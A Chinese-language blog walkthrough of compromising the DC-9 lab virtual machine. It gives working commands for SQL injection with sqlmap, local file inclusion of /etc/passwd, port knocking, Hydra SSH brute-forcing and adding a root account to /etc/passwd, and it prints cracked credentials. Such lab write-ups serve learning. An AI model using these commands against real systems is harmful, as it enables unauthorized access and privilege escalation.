信息收集
老套路了,还是直接上图
目标靶机ip192.168.8.122
,本机ip192.168.8.121
22和80端口(奇怪的是这里22端口被折叠了),apache中间件,Debian系统,访问一下其web服务
一时间没看出来是什么CMS
目录扫描给的结果也十分简略
发现利用点
/includes
目录有一个信息泄露但并没有什么卵用。但是在主页面的Search中,可以检索Display All Record的用户,也即与数据库存在交互,但是搜索的结果为/result.php
说明不是Get传参,而是Post!有了个思路了,我们打开burpsuite
果然,Post传参,变量为search,那说明在这个位置可能存在sql注入
果然,当我测了几种注入就出来了前面的所有信息,那接下来,懒人用法:sqlmap!
1 | sqlmap python3 -u http://192.168.8.122/results.php --data "search=1" --dbs |
很快就爆出来了库名儿
忙猜一波Staff库,users可能是web页面上的哪些信息
1 | sqlmap python3 -u http://192.168.8.122/results.php --data "search=1" -D Staff -T Users -C Username,Password --dump |
对此我只能说sqlmap真香啊!还自带MD5解码,呜呜呜太贴心了
Username | Password |
---|---|
admin | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) |
不说了,直接管理员账号登录呜呜呜
登录上去后在Manage页面下方,有一个File does not exist
的话语,好生熟悉哇!这不就。。。文件包含漏洞?
构造Get传参,使用burpsuite爆破变量名称
1 | GET /manage.php?$cat$=../../../../etc/passwd |
1 | root:x:0:0:root:/root:/bin/bash |
显然变量名仍然为file
,然后写入报错日志,就像之前的一样吗,但是访问了一下发现,该靶机并无法访问日志(不是nginx),所以思路要向挂马方向转变。以上是/etc/passwd
的用户信息,可以看出来有很多很多,突然想起一个细节,,,我爆数据库时候没细看其他库名儿。。。
果然啊,在其他库里发现了这些用户信息,失算了。。。
之后是ssh爆破了,不过显然,之前的信息22端口折叠了,这里真的是断思路了。只好求助谷歌爸爸,搜索发现这是端口保护机制,首先访问一下/etc/knockd.conf
文件
端口敲门,依次访问7469,8475,9842这几个端口,即可打开22端口,直接nc连接进行敲击
1 | nc 192.168.8.122 7469 |
有结果可见,ssh的22端口变为开放状态,那就hydra爆破吧!(。。。用户名儿和密码的字典里不要有空格,,,)
1 | hydra -L DC9-user.txt -P DC9-pwd.txt 192.168.8.122 ssh |
使用janitor用户登录,在他的/home/janitor
文件夹发现了.secrets-for-putin
文件,里面有一个密码本
使用了sudo -l
后发现该用户并无无密码权限
那继续换人爆破
本地提权
加入新密码后又爆破出来了一个账号,使用fredf:B4-Tru3-001
登录
该用户具有无密码的root权限
以防万一,也查了一下SUID提权,发现不太熟悉,不如直接走预期解
运行该文件,发现需要一个test.py的python程序。找吧
1 | find / -name test.py 2>/dev/null |
1 | #!/usr/bin/python |
py文件的含义为:
读取参数1的内容,然后将参数1的内容写入到参数2的内容中。
那我们可以构造一个root权限用户,将该用户信息写入文件内,将改文件作为参数1,
/etc/passwd
作为参数2,这样就创建了一个root权限用户,就能实现提权了 链接
首先,仿照/etc/passwd
格式生成一个root用户文件
1 | openssl passwd -1 -salt admin 123456 |
1 | echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/shell |
OK!
莫名又有点小伤感了
尾声
呼,至此DC系列结束了XD
很好玩,学到了很多很多很多!
但是,自己的基础知识太差了,接下来会恶补基础知识吧!
加油!
- 本文作者: Isabella
- 本文链接: https://username.github.io/2021/02/28/DC9靶机渗透记录/
- 版权声明: 本博客所有文章除特别声明外,均采用 MIT 许可协议。转载请注明出处!